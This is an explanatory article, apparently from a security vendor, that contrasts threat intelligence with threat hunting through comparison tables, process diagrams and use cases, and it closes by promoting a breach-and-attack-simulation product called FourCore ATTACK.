Threat Intelligence vs Threat Hunting
Threat intelligence and threat hunting are two complementary disciplines in modern security operations. While they are often conflated, they serve distinct purposes and require different approaches.
What is Threat Intelligence?
Threat intelligence (TI) is the collection, analysis, and dissemination of information about current and emerging threats to an organisation. It provides context about adversaries, their motivations, capabilities, and the tactics, techniques, and procedures (TTPs) they employ.
What is Threat Hunting?
Threat hunting is the proactive, hypothesis-driven search for threats that have evaded existing security controls. Hunters actively look for indicators of compromise (IoCs), anomalous behaviour, and adversary presence that automated tools have not detected.
Comparison Table
| Aspect | Threat Intelligence | Threat Hunting |
|---|---|---|
| Primary Goal | Provide context about threats | Find hidden threats in the environment |
| Approach | Collection and analysis of external data | Proactive, hypothesis-driven investigation |
| Data Sources | Open-source feeds, dark web, vendor reports, ISACs | Internal telemetry, logs, endpoint data, network traffic |
| Focus | What threats exist and who is behind them | Whether specific threats are present in your environment |
| Output | IoCs, threat reports, actor profiles, risk assessments | Findings, detection gaps, new detection rules |
| Skillset | Analysis, research, language skills, geopolitics | Deep technical expertise, OSINT, reverse engineering |
| Timeframe | Ongoing collection and analysis | Time-bounded investigations |
| Trigger | New threat intel, vulnerability disclosure, industry alert | Hypothesis, anomaly, intel lead, scheduled rotation |
| Automation Level | High (feeds, enrichment, correlation) | Low to moderate (analysis-driven) |
| Measurement | Relevance, timeliness, accuracy of intel | Threats found, detection gaps identified, dwell time reduced |
| MITRE ATT&CK Usage | Maps threats to techniques for context | Uses techniques to guide search hypotheses |
The Threat Intelligence Lifecycle
┌─────────────────────────────────────────────────────┐
│ Threat Intelligence Lifecycle │
│ │
│ Planning ──→ Collection ──→ Processing ──→ Analysis│
│ ↑ │ │
│ │ ↓ │
│ └──────────── Dissemination ◄─────────────┘ │
│ │ │
│ ↓ │
│ Feedback & Refinement │
└─────────────────────────────────────────────────────┘
Key Activities:
- Monitoring threat feeds and advisories
- Tracking adversary groups and campaigns
- Analysing malware samples and attack patterns
- Mapping threats to MITRE ATT&CK techniques
- Providing actionable intelligence to defenders
The Threat Hunting Process
┌─────────────────────────────────────────────────────┐
│ Threat Hunting Process │
│ │
│ Hypothesis ──→ Data Collection ──→ Analysis │
│ ↑ │ │
│ │ ↓ │
│ └────────── Refinement ◄── Findings & TTPs │
│ │ │
│ ↓ │
│ New Detections & Rules │
└─────────────────────────────────────────────────────┘
Key Activities:
- Developing hypotheses based on threat intelligence
- Searching for indicators of compromise
- Analysing anomalous behaviour patterns
- Validating detection rule effectiveness
- Building new detections based on findings
How They Work Together
| Stage | Threat Intelligence Role | Threat Hunting Role |
|---|---|---|
| Preparation | Provides adversary profiles and TTPs | Develops hunting hypotheses |
| Collection | Gathers external threat data | Collects internal telemetry |
| Analysis | Correlates threats across campaigns | Searches for specific indicators |
| Detection | Informs detection rule creation | Validates detection effectiveness |
| Response | Provides attribution and context | Confirms threat presence and scope |
| Improvement | Updates threat models | Refines detections and hunting playbooks |
Common Use Cases
Threat Intelligence Use Cases
- Adversary profiling: Understanding which threat actors target your industry
- Vulnerability prioritisation: Using threat context to prioritise patches
- Risk assessment: Quantifying threat exposure for business decisions
- Incident response support: Providing attribution and TTP context during incidents
- Strategic planning: Informing security investment decisions
Threat Hunting Use Cases
- Hidden threat detection: Finding adversaries that bypassed automated defences
- Detection gap discovery: Identifying blind spots in security monitoring
- Lateral movement detection: Hunting for internal network compromise
- Data exfiltration hunting: Searching for unauthorised data transfers
- Insider threat detection: Identifying suspicious internal activity
The Role of BAS in Both Disciplines
Breach and Attack Simulation bridges threat intelligence and threat hunting by:
| Discipline | How BAS Helps |
|---|---|
| Threat Intelligence | Validates whether intelligence-mapped TTPs would be detected in your environment |
| Threat Hunting | Provides hunting hypotheses by simulating attack techniques and testing if they leave detectable traces |
BAS-Enhanced Workflow
- Threat Intelligence identifies a new adversary TTP
- BAS simulates the TTP in your environment
- Results show whether existing detections catch the technique
- Threat Hunters investigate any detection gaps
- New detections are built and validated with BAS retesting
This creates a continuous improvement cycle that operationalises threat intelligence through automated validation and targeted hunting.
FourCore ATTACK enables organisations to operationalise threat intelligence by automatically simulating adversary TTPs and validating detection capabilities, providing actionable hunting hypotheses and measurable security posture improvements.
